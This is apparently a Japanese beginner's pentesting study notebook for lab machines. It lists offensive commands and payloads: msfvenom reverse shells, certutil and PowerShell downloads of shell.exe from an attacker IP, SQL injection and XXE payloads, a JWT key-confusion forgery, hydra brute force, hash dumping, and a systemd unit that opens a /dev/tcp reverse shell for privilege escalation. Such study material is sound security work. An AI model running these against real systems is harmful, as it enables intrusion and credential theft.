White Hat Hackerになるまでの道のりを記しておく。
実際になったわけではなく、なるために勉強をすすめる際のメモを残しておこうと思う。
今回はPentestingを行う上で役に立つコマンドやTipsをここにためていけば、後で役に立つかも?との安易な気持ちで書いてみる。そのため、今後随時更新していく予定。
また参考にした動画やサイトの情報も合わせて記載しておくことにする。
もっと良いサイトや動画をご存知の方はぜひ教えていただきたい。
また、はじめに断っておくが、noobなので無意味で意味不明な行動やオプション指定などがあるかもしれない。気づいた人はぜひ指摘いただきたい。
Useful Commands
linux-command equivalent/alternative commands on Windows
cat
type <FILE_NAME>
wget
bitsadmin.exe /TRANSFER <ジョブ名> <リモートURL> <ダウンロード先>
powershell "Invoke-WebRequest -OutFile shell.exe -Uri http://10.13.6.60:8888/shell.exe"
Invoke-WebRequest -OutFile shell.exe -Uri http://10.13.6.60:8888/shell.exe
certutil.exe -urlcache -split -f "http://10.13.6.60:8888/shell.exe" shell.exe
Search files & Show contents
Windows
dir \s *FILE_NAME*
type NAME_OF_THE_FILE
参考:
https://qiita.com/asmin/items/d53e71ed98a377ca7823
NFS
showmount - show mount information for an NFS server
Linux
/usr/sbin/showmount
SMB
Linux
smbclient //[IP]/[SHARE]
Followed by the tags:
-U [name] : to specify the user
-p [port] : to specify the port
以下のようにすれば再帰的にshareのダウンロードができる
smbget -R smb://<ip>/anonymous
Simple HTTP Server
Python3
python -m http.server [port]
インターフェース情報(IP addressなど)の確認
Linux
ifconfig
ワイヤレス情報(IP addressなど)の確認
Linux
iwconfig
ユーザーの変更
Linux
su
マシンの応答確認(Ping)
Linux
ping <ip_address>
ping -c <n> <ip_address>
n: pingコマンドを発行する回数
arpキャッシュの表示
Linux
arp [-a] <host_name>
-a: BSDスタイルで表示
https://youtu.be/qlK174d_uu8?t=3797
LISTEN portの確認
Linux
netstat [-ano]
ルーティングテーブルの表示
Linux
route
管理者権限でコマンド実行
Linux
sudo
Webサーバの起動・停止
Linux
service apache2 start
service apache2 stop
OS起動時に自動で実行されるようにしたい場合
systemctl enable apache2
SSHサーバの起動・停止
Linux
service ssh start
service ssh stop
OS起動時に自動で実行されるようにしたい場合
systemctl enable ssh
dig/ whois
tctrace
特定のグループに所属するユーザーの確認
getent group
Way to crack SQLite databases
kali@kali:~/ダウンロード$ sqlite3 webapp.db
SQLite version 3.33.0 2020-08-14 13:23:32
Enter ".help" for usage hints.
sqlite> .tables
sessions users
sqlite> PRAGMA table_info(users);
0|userID|TEXT|1||1
1|username|TEXT|1||0
2|password|TEXT|1||0
3|admin|INT|1||0
sqlite> select * from users;
4413096d9c933359b898b6202288a650|admin|6eea9b7ef19179a06954edd0f6c05ceb|1
23023b67a32488588db1e28579ced7ec|Bob|ad0234829205b9033196ba818f7a872b|1
4e8423b514eef575394ff78caed3254d|Alice|268b38ca7b84f44fa0a6cdc86e6301e0|0
sqlite>
XXE Payload example
<!DOCTYPE replace [<!ENTITY name "feast"> ]>
<userInfo>
<firstName>falcon</firstName>
<lastName>&name;</lastName>
</userInfo>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
Permission の確認
Windows
icacls
Creating Hex Dump
Linux
xxd -p | tr -d
File Download wget
Windows
certutil.exe -urlcache -split -f http://10.13.6.60:80/win.exe
Useful Tips
ユーザー情報格納先
Linux
/etc/passwd
パスワードハッシュの格納先
Linux
/etc/shadow
sudo設定 (sudoers)
explainations
Payload Generator
msfvenom
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=[vpnIP] LPORT=[LPORT] -f exe -o reverse.exe
then run the following
> msfconsole
and
> use exploit/multi/handler
msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R
-p <payload> payload
lhost=<LOCAL_HOST> local host IP address
lport=<LOCAL_PORT> = the port to listen on R` export the payload in raw format
msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>
-f <format> Specifies the output format. In this case that is an executable (exe)
-o <file>
The output location and filename for the generated payload.
LHOST=<IP>
Specifies the IP to connect back to.
LPORT=<port>
The port on the local machine to connect back to.
getuid
Display the created time, access time, modified time, and entry modified time of the file
timestomp <FILE_NAME> -v
- Key logger
keyscan_start
and
keyscan_dump
Metasploit
Search for vulnerability
search cve:2009 type:exploit platform:-linux
How to add modules from exploit db
権限関連のインシデント情報格納先
Linux
/var/log/auth.log
SQL Injection Tips
Login bypass
Commonly used
' or true --
') or true–
Blind SQLi
?id=1' AND (ascii(substr((select database()),1,1))) = 115 --+
Note: 115 is 's' in ASCII, if there's no error. If there's no obvious error, it indicates that the first letter of the database is 's'
UNION SQLi
UNION SQLi attack consists of 3 stages:
- Finding the number of columns
- Checking if the columns are suitable
- Attack and get some interesting data.
Columnの数を調べる
'ORDER BY'をエラーが出るまで1ずつ増やしながら繰り返す。エラーが出る1つ前がColumnの数。
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
UNION SELECT アタック
'UNION SELECT' と NULLのペイロードでエラーが出るまでNULLを増やしながら繰り返す。エラーが出る1つ前のNULLの数がColumn数。
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
Note: Oracleの場合は' UNION SELECT NULL FROM DUAL--とする。理由は、ORACLEの仕様でSELECT文には必ずFROMキーワードを使用する必要があるため。DUALはORACLEのBuilt-inテーブル。
悪用できそうなデータタイプのチェック
悪用できそうなデータはstringのdata typeで保存されていることが多い。この前提のもと、column数を調べたあとは、string、またはstring-compatibleなcolumnを探す。
以下のようにひとつずつcolumnの数だけstring dataをぶつけて(ここでは'a')試していく。エラーがでなければstringか互換性のあるdata typeということがわかる。
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--
その他、有益なことが多いdata:
- database()
- user()
- @@version
- username
- password
- table_name
- column_name
参考:
https://portswigger.net/web-security/sql-injection/union-attacks
ツール
Linpeas
Linux Priv Esc に使えそうな情報を一挙に調べ上げるツール
SQLMap
Tips
Burp Suiteの出力を利用する
sqlmap -r filename --dmbs=mysql --dump
Hash ハッシュ からハッシュタイプ(Hash type)を調べる
online
Python
Prefix から調べる
GoBuster(Brute-force URIs, DNS subdomains, virtual host names)
gobuster dir -uhttp://example.com -w wordlist.txt -x php,txt,html
kali@kali:~$ gobuster --help
Usage:
gobuster [command]
Available Commands:
dir Uses directory/file brutceforcing mode
dns Uses DNS subdomain bruteforcing mode
help Help about any command
vhost Uses VHOST bruteforcing mode
Flags:
-h, --help help for gobuster
-z, --noprogress Don't display progress
-o, --output string Output file to write results to (defaults to stdout)
-q, --quiet Don't print the banner and other noise
-t, --threads int Number of concurrent threads (default 10)
-v, --verbose Verbose output (errors)
-w, --wordlist string Path to the wordlist
Use "gobuster [command] --help" for more information about a command.
wfuzz (Fuzzing)
FuzzingとはFancyなBrute-forceとも言えるとのこと。
Fuzzing is using security tools to automate the input of data we provide into things such as websites or software applications. Fuzzing is an extremely effective process as computers can perform laborious actions like trying to find hidden files/folders, try different usernames and passwords much quicker then a human can (and is willing to do...)
wfuzz -c -z file,/usr/share/wordlists/dirb/big.txt localhost:80/FUZZ/note.txt
kali@kali:~$ wfuzz -h
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
* *
* Version up to 1.4c coded by: *
* Christian Martorella (cmartorella@edge-security.com) *
* Carlos del ojo (deepbit@gmail.com) *
* *
* Version 1.4d to 2.4.5 coded by: *
* Xavier Mendez (xmendez@edge-security.com) *
********************************************************
Usage: wfuzz [options] -z payload,params <url>
FUZZ, ..., FUZnZ wherever you put these keywords wfuzz will replace them with the values of the specified payload.
FUZZ{baseline_value} FUZZ will be replaced by baseline_value. It will be the first request performed and could be used as a base for filtering.
Options:
-h : This help
--help : Advanced help
--version : Wfuzz version details
-e <type> : List of available encoders/payloads/iterators/printers/scripts
-c : Output with colors
-v : Verbose information.
--interact : (beta) If selected,all key presses are captured. This allows you to interact with the program.
-p addr : Use Proxy in format ip:port:type. Repeat option for using various proxies.
Where type could be SOCKS4,SOCKS5 or HTTP if omitted.
-t N : Specify the number of concurrent connections (10 default)
-s N : Specify time delay between requests (0 default)
-R depth : Recursive path discovery being depth the maximum recursion level.
-L, --follow : Follow HTTP redirections
-u url : Specify a URL for the request.
-z payload : Specify a payload for each FUZZ keyword used in the form of type,parameters,encoder.
A list of encoders can be used, ie. md5-sha1. Encoders can be chained, ie. md5@sha1.
Encoders category can be used. ie. url
Use help as a payload to show payload plugin's details (you can filter using --slice)
-w wordlist : Specify a wordlist file (alias for -z file,wordlist).
-V alltype : All parameters bruteforcing (allvars and allpost). No need for FUZZ keyword.
-X method : Specify an HTTP method for the request, ie. HEAD or FUZZ
-b cookie : Specify a cookie for the requests
-d postdata : Use post data (ex: "id=FUZZ&catalogue=1")
-H header : Use header (ex:"Cookie:id=1312321&user=FUZZ")
--basic/ntlm/digest auth : in format "user:pass" or "FUZZ:FUZZ" or "domain\FUZ2Z:FUZZ"
--hc/hl/hw/hh N[,N]+ : Hide responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--sc/sl/sw/sh N[,N]+ : Show responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--ss/hs regex : Show/Hide responses with the specified regex within the content
CrackStation (for cracking password hashes)
Maltego (information gathering)
https://www.maltego.com/
一般公開されている情報を元にターゲットの情報を自動収集できる
解説動画
https://youtu.be/zemNLx0-LRw
Reverse shells
PHP
/usr/share/webshells/php/php-reverse-shell.php
Others
Impacket
Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.
Kali Linux でインストールされているimpacketは壊れている?らしく、一度アンインストール(purge)が必要らしい。
apt purge *impact*
cd <インストールしたいdirectory>
git clone https://github.com/SecureAuthCorp/impacket.git
pip install .
pingで応答のあるサーバ一覧を取得する方法(shell)
スクリプト(ipsweep.sh)
#!/bin/bash
if [ "$1" == "" ]
then
echo "You forgot an IP address!"
echo "Syntax: ./sweep.sh 192.168.1"
else
for ip in `seq 1 254`; do
ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
done
fi
実行方法
chmod +x ipsweep.sh
./ipsweep.sh <ネットワークアドレス、、のようなもの>
(例)
./ipsweep.sh 192.168.1 > iplist.txt
後にiplist.txtをnmapのターゲットリストに使用する
hashcat
Fast password cracker, accelerated by GPU
tmux
Tplmap
Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system.
The tool and its test suite are developed to research the SSTI vulnerability class and to be used as offensive security tool during web application penetration tests.
LinEnum
LinEnum is a simple bash script that performs common commands related to privilege escalation, saving time and allowing more effort to be put toward getting root.
Anonymous net surfing
Proxy Switcher
Easy to switch proxy servers
https://www.proxyswitcher.com/
cyber ghost VPN
VPN service
https://www.cyberghostvpn.com/en_US/
others
Tor (https://www.torproject.org)
Burp Suite (https://www.portswigger.net)
Hotspot Shield (https://www.hotspotshield.com)
Proxifier (https://www.proxifier.com)
Charles (http://www.charlesproxy.com)
Fiddler (http://www.telerik.com)
Protoport Proxy Chain (http://www.protoport.com)
ProxyCap (http://www.proxycap.com)
Module
GTFOBins
GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
Have I Been Pwned
Check if you have an account that has been compromised in a data breach
OSINT
Namechk
WhatsMyName
NameChekup
sherlock
script 4 inserure deserialization OWASP 10 vulnerability
explanation Python Pickle module
dirb
DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the response.
DIRB comes with a set of preconfigured attack wordlists for easy usage but you can use your custom wordlists. Also DIRB sometimes can be used as a classic CGI scanner, but remember is a content scanner not a vulnerability scanner.
DIRB main purpose is to help in professional web application auditing. Specially in security related testing. It covers some holes not covered by classic web vulnerability scanners. DIRB looks for specific web objects that other generic CGI scanners can’t look for. It doesn’t search vulnerabilities nor does it look for web contents that can be vulnerables.
dirbuster
wordlist
nikto
cheat sheet
kali@kali:~$ nikto -h http://10.10.147.61:1234/manager/html -id bob:bubbles
XSRFProbe
XSRFProbe is an advanced Cross Site Request Forgery (CSRF/XSRF) Audit and Exploitation Toolkit. Equipped with a powerful crawling engine and numerous systematic checks, it is able to detect most cases of CSRF vulnerabilities, their related bypasses and futher generate (maliciously) exploitable proof of concepts with each found vulnerability. For more info on how XSRFProbe works, see XSRFProbe Internals on wiki.
Nessus
脆弱性調査ツール。
フリーバージョンもあり。
https://www.tenable.com/products/nessus
Enum4Linux
WindowsとLinuxシステムの両方の上でのSMBを列挙するためのツール。
基本的には、Sambaパッケージに含まれるツールのラッパーで、SMB関連のターゲットから素早く情報を抜き取ることを簡単にできるようにする。
Kali Linux には標準でインストール済み。
Official Download
SecLists(collection of commom usernams, passwords(default passowrds), URLS etc.)
SecLists is a collection of common lists including usernames, passwords, URLs and much more.
hydra (online password cracking tool)
syntax
hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp
SECTION FUNCTION
hydra Runs the hydra tool
-t 4 Number of parallel connections per target
-l [user] Points to the user who's account you're trying to compromise
-P [path to dictionary] Points to the file containing the list of possible passwords
-vV Sets verbose mode to very verbose, shows the login+pass combination for each attempt
[machine IP] The IP address of the target machine
ftp / protocol Sets the protocol
kali@kali:~$ hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV 10.10.35.24 ssh
hydra -l <username> -P <full path to pass> 10.10.217.219 -t 4 ssh
hydra -l <username> -P <wordlist> 10.10.217.219 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
Breaking RSA cryptography
IDS (Intrusion Detection System) and IPS (Prevension System)
Suricata
Snort
Firewall
pfsense
Reverse Engineering
Radare2
ILSpy
This is for .NET
https://github.com/icsharpcode/ILSpy
Dotpeek
This is for .NET
https://www.jetbrains.com/decompiler/
Kerberos
Kerbrute
Bruteforce Kerberos, Active Directory
Rubeus
C# toolset for raw Kerberos interaction and abuses.
Kerberoasting w/ Impacket
Prerequisite: the attacking user must be a Service Account.
sudo python3 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.191.46 -request
AS-REP roasting
Prerequisite: the attacking user must have pre-authentication disabled. (Unlike Kerberoasting, it is not required to be a Service Account.)
Reference
Powerview CheatShet
https://gist.github.com/HarmJ0y/3328d954607d71362e3c
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
SQL injection
Explanations and related articles
SQLMap Cheat Sheet
JWT (Jason Web Token)
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJQYXJhZG94IiwiaWF0IjoxNjEwNDU0MjM5LCJleHAiOjE2MTA0NTQzNTksImRhdGEiOnsicGluZ3UiOiJub290cyJ9fQ.gSf3YRlqXj6OWNhckD_zWYdidvydVdFRirj5W9o-YwzXyWQeMi0M9Z0riy92JEKkeGeC3TP1_O6WATSa7pxK2xHcw3ubexeifZtYOQWugNuzcHGYPweipcCDhSPLFQ3PuIj9Hjyws05bHZm2vwptcsCuyY0ax6VMTqlYb8wzE_Wgp-CqwgF9M74tp1tJI0nVrL47Tz2JvS0MYZG1Lt5ad0Sttc9Ce4BxamfTm_qEVcD42wE7RsQfyjtU7clNT1DVkTvwmyCqS2GnXd-kHwBHLVrjnrWJ_FMCA3BVwuctjQJlGqGpeyKvRCiL3j6FFPeqtgh7ZkfsjJIJ9X-Xo4VGHA
Decode it since it is encoded by Base64 encoding.
{"typ":"JWT","alg":"HS256"}{"iss":"Paradox","iat":1610454239,"exp":1610454359,"data":{"pingu":"noots"}}v¥ãèå
ÉÍfÛòuWEF*ãåohc×Éd2-õ+/v$B¤xgÝ3õ;¥M&»§¶Äw0ÞæÞÅèfÖAk 6ìÜfÁè©p áHòÅCsî"?G,,ÓÇfm¯Â\°+²cF±éSªVóÄZ
B«ôÎø¶m$'V²øí<ö&ô´1FÔ»yiݶ×= îÅ©NjUÀøÛ;FÄÊ;TíÉMOPÕ;ð ªKa§]ÙÀËV¸çbE0 7\.rØÐ&Qª²*ôB½ãèQOz«`¶d~ÈÉ W^p
Change the algorithm from HS256 to AS256 and re-encode it.
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJQYXJhZG94IiwiaWF0IjoxNjEwNDU0MjM5LCJleHAiOjE2MTA0NTQzNTksImRhdGEiOnsicGluZ3UiOiJub290cyJ9fQ.gSf3YRlqXj6OWNhckD_zWYdidvydVdFRirj5W9o-YwzXyWQeMi0M9Z0riy92JEKkeGeC3TP1_O6WATSa7pxK2xHcw3ubexeifZtYOQWugNuzcHGYPweipcCDhSPLFQ3PuIj9Hjyws05bHZm2vwptcsCuyY0ax6VMTqlYb8wzE_Wgp-CqwgF9M74tp1tJI0nVrL47Tz2JvS0MYZG1Lt5ad0Sttc9Ce4BxamfTm_qEVcD42wE7RsQfyjtU7clNT1DVkTvwmyCqS2GnXd-kHwBHLVrjnrWJ_FMCA3BVwuctjQJlGqGpeyKvRCiL3j6FFPeqtgh7ZkfsjJIJ9X-Xo4VGHA
convert the public key to hex so openssl will use it.
$ cat public.pem | xxd -p | tr -d "\\n" 1 ⨯
2d2d2d2d2d424547494e205055424c4943204b45592d2d2d2d2d0a4d494942496a414e42676b71686b6947397730424151454641414f43415138414d49494243674b4341514541716938546e75514247584f47782f4c666e344a460a4e594f4832563171656d6673383373745763315a4251464351415a6d55722f736762507970597a7932323970466c3662476571706952487253756648756737630a314c4379616c795545502b4f7a65716245685353755573732f5879667a79624975736271494445514a2b5965783343646777432f68414633787074562f32742b0a48367930476468317765564b524d382b5161655755784d474f677a4a59416c55635241503564526b454f5574534b4842464f466845774e425872664c643736660a5a58504e67794e30547a4e4c516a50514f792f744a2f5646713843514745342f4b35456c5253446c6a346b7377786f6e575859415556786e71524e314c4748770a32473551524532443133734b484343385a725a584a7a6a36374872713568325341444b7a567a684138415733575a6c504c726c46543374312b695a366d2b61460a4b774944415141420a2d2d2d2d2d454e44205055424c4943204b45592d2d2d2d2d0a
Generate HMAC signature by supplying our public key as ASCII hex and with the token.
$ echo -n "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJQYXJhZG94IiwiaWF0IjoxNjEwNDg4Mzg2LCJleHAiOjE2MTA0ODg1MDYsImRhdGEiOnsicGluZ3UiOiJub290cyJ9fQ" |
openssl dgst -sha256 -mac HMAC -macopt hexkey:2d2d2d2d2d424547494e205055424c4943204b45592d2d2d2d2d0a4d494942496a414e42676b71686b6947397730424151454641414f43415138414d49494243674b4341514541716938546e75514247584f47782f4c666e344a460a4e594f4832563171656d6673383373745763315a4251464351415a6d55722f736762507970597a7932323970466c3662476571706952487253756648756737630a314c4379616c795545502b4f7a65716245685353755573732f5879667a79624975736271494445514a2b5965783343646777432f68414633787074562f32742b0a48367930476468317765564b524d382b5161655755784d474f677a4a59416c55635241503564526b454f5574534b4842464f466845774e425872664c643736660a5a58504e67794e30547a4e4c516a50514f792f744a2f5646713843514745342f4b35456c5253446c6a346b7377786f6e575859415556786e71524e314c4748770a32473551524532443133734b484343385a725a584a7a6a36374872713568325341444b7a567a684138415733575a6c504c726c46543374312b695a366d2b61460a4b774944415141420a2d2d2d2d2d454e44205055424c4943204b45592d2d2d2d2d0a
(stdin)= d46b02fd2a91fbc68a0d946f6b9e5f1a9659c1902fedc39f7f05ae0ba7b12971
Convert signature (Hex to "base64 URL")
$ python2 -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('d46b02fd2a91fbc68a0d946f6b9e5f1a9659c1902fedc39f7f05ae0ba7b12971')).replace('=','')\")"
1GsC_SqR-8aKDZRva55fGpZZwZAv7cOffwWuC6exKXE
Brute force the secret
For HS256, brute-forcing the secret is possible since HS256 is a symmetric algorithm.
Cross-Site Scripting (XSS)
Explanations and related articles
https://developers.google.com/web/fundamentals/security/csp
https://www.hacksplaining.com/exercises/xss-stored
Cheat sheet
SSRF (Server-Side Request Forgery)
Bypass filters.
http://[::]:3306 or
http://:::3306
IDOR (Insercure Direct Objct Reference)
IDOR is the act of exploiting a misconfiguration in the way user input is handled, to access resources you wouldn't ordinarily be able to access.
Rainbow Table Attack
Explanations and related articles
Reverse Shell
What is it?
snipet for PHP
Cheat sheet
ICMP Shell
MIME Sniffing
Explanations and related articles
- XSSの脆弱性につながる可能性がある
- CSP(Content-Security-Policy)を設定していても抜け道となる可能性がある
- ブラウザの挙動に依存する
What should we do
- HTTP responseのContent-Type Headerを正しく設定する
- X-Content-Type-Options Headerにnosniffを設定する(nosniffのみ設定可能)
CSRF (Cross-site Request Forgery)
Explanations and related articles
Google Dorks
Exploit を探す! (CVE - Common Vulnerabilities and Exposures)
NVD
CVEの番号形態: CVE-年-ID
例: CVE-2020-13955
Exploit DB
https://www.exploit-db.com/
Exploit をダウンロードできる
Kali Linux の searchsploit というツールで ExploitDBから検索ができる
CVE Mitre
AttackerKB
XSS Payloads ライブラリ
Privesc を目論む際にまずは確認することリスト
LinEnum で情報収集する
- kernelに脆弱性はないか
- センシティブなファイルのread/write権限の設定ミスはないか
- SUID/GUIDでrootなど利用できるものはないか? rootやrootグループなど
- sudo -l でできることを確認したか (vi がrootで実行できる、NOPASSWD設定など)
(vi がroot権限で実行できる → vi 実行 ":!sh" でroot権限のshell) - crontabのコマンドで怪しいもの、rootで動くものを利用できないか (cronはrootで実行される)
- root権限は誰がもっているか
- PATHの書き換えはできないか? (PATH上書きでSUIDのバイナリーを読み込むもとを変更する)
例: SUIDのついているファイル検索
find / -perm -u=s -type f 2>/dev/null
例: /etc/passwdのエントリー(パスワードフィールド)作成(MD5)
openssl passwd -1 -salt [salt] [password]
Cron で privesc (by wildcard)
Useful チェックリスト
- https://payatu.com/guide-linux-privilege-escalation
- https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
- https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-Escalation.md
- https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation
- https://payatu.com/guide-linux-privilege-escalation
systemctl にSUIDがセットされていることがわかった場合
systemctlにSUIDがセットされている場合、rootへの権限昇格ができる(by reverse_shell)
kali@kali:~$ cat root.service
[Unit]
Description=roooooot
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.13.6.60/5555 0>&1'
[Install]
WantedBy=multi-user.target
kali@kali:~/ダウンロード/php-reverse-shell-master$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.13.6.60] from (UNKNOWN) [10.10.28.226] 39414
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
04:22:53 up 3 min, 0 users, load average: 0.02, 0.05, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ cd /tmp
$ wget http://10.13.6.60:6666/root.service
--2020-11-15 04:23:30-- http://10.13.6.60:6666/root.service
Connecting to 10.13.6.60:6666... connected.
HTTP request sent, awaiting response... 200 OK
Length: 166 [application/octet-stream]
Saving to: 'root.service'
0K 100% 557K=0s
2020-11-15 04:23:31 (557 KB/s) - 'root.service' saved [166/166]
$ /bin/systemctl enable /tmp/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /tmp/root.service.
Created symlink from /etc/systemd/system/root.service to /tmp/root.service.
$ /bin/systemctl start root
How HTTPS works
What is Enumeration?
Payload Cheat Sheet
-
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
SQL Injection, Reverse Shell in various Langs.
SMTP Enum
use metasploit's 'smtp_enum'
Example:
msf6 auxiliary(scanner/smtp/smtp_version) > search smtp_enum
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smtp/smtp_enum normal No SMTP User Enumeration Utility
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smtp/smtp_enum
msf6 auxiliary(scanner/smtp/smtp_enum) > options
Module options (auxiliary/scanner/smtp/smtp_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.35.24 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 25 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
UNIXONLY true yes Skip Microsoft bannered servers when testing unix users
USER_FILE /home/kali/SecLists/Usernames/top-usernames-shortlist.txt yes The file that contains a list of probable users accounts.
MySQL Enum
msf6 > search mysql_sql
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/mysql/mysql_sql normal No MySQL SQL Generic Query
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/mysql/mysql_sql
msf6 auxiliary(admin/mysql/mysql_sql) > options
Module options (auxiliary/admin/mysql/mysql_sql):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
SQL select version() yes The SQL to execute.
USERNAME no The username to authenticate as
msf6 auxiliary(admin/mysql/mysql_sql) > set RHOSTS 10.10.177.233
RHOSTS => 10.10.177.233
msf6 auxiliary(admin/mysql/mysql_sql) > set USERNAME root
USERNAME => root
msf6 auxiliary(admin/mysql/mysql_sql) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(admin/mysql/mysql_sql) > exploit
[*] Running module against 10.10.177.233
[*] 10.10.177.233:3306 - Sending statement: 'select version()'...
[*] 10.10.177.233:3306 - | 5.7.29-0ubuntu0.18.04.1 |
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mysql/mysql_sql) > set SQL show databases
SQL => show databases
msf6 auxiliary(admin/mysql/mysql_sql) > exploit
[*] Running module against 10.10.177.233
[*] 10.10.177.233:3306 - Sending statement: 'show databases'...
[*] 10.10.177.233:3306 - | information_schema |
[*] 10.10.177.233:3306 - | mysql |
[*] 10.10.177.233:3306 - | performance_schema |
[*] 10.10.177.233:3306 - | sys |
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mysql/mysql_sql) >
Schema Dump
msf6 auxiliary(scanner/mysql/mysql_schemadump) > options
Module options (auxiliary/scanner/mysql/mysql_schemadump):
Name Current Setting Required Description
---- --------------- -------- -----------
DISPLAY_RESULTS true yes Display the Results to the Screen
PASSWORD password no The password for the specified username
RHOSTS 10.10.177.233 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME root no The username to authenticate as
msf6 auxiliary(scanner/mysql/mysql_schemadump) >
Hash Dump
msf6 auxiliary(scanner/mysql/mysql_schemadump) > search mysql_hashdump
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/analyze/crack_databases normal No Password Cracker: Databases
1 auxiliary/scanner/mysql/mysql_hashdump normal No MYSQL Password Hashdump
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/mysql/mysql_hashdump
msf6 auxiliary(scanner/mysql/mysql_schemadump) > use 1
msf6 auxiliary(scanner/mysql/mysql_hashdump) > options
Module options (auxiliary/scanner/mysql/mysql_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD password no The password for the specified username
RHOSTS 10.10.177.233 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME root no The username to authenticate as
msf6 auxiliary(scanner/mysql/mysql_hashdump)
samdump2
SAM(Security Account Manager) は database ファイルの一つ。
python2 が生きていたころは、
https://github.com/Neohapsis/creddump7.git
が使えていたと思われるが、2020年12月現在に試してみたところうまく行かない。
(追記)
下記をインストールすれば動作することが判明
- pip のインストール
curl https://bootstrap.pypa.io/get-pip.py | sudo python -
sudo pip install pycrypto
代替案の一つとして見つけたツールがこのsamdump2。kali linuxには標準で入っているが、windows10には適用できなそう。
└─$ samdump2 SYSTEM SAM 255 ⨯
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
nmap
NSE (Nmap Script Engine)
Categories
- safe:- Won't affect the target
- intrusive:- Not safe: likely to affect the target
- vuln:- Scan for vulnerabilities
- exploit:- Attempt to exploit a vulnerability
